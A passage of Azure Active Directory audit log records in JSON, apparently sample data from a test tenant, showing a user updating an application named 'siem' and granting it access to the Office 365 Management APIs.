\"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n 
\"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": 
"51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, 
{"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n 
\"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": 
"MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": 
"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": 
"targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7823970Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793206"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "606ae654-e71e-4a6b-a07c-85acd775667b"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", 
"ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": 
"env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": 
"ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 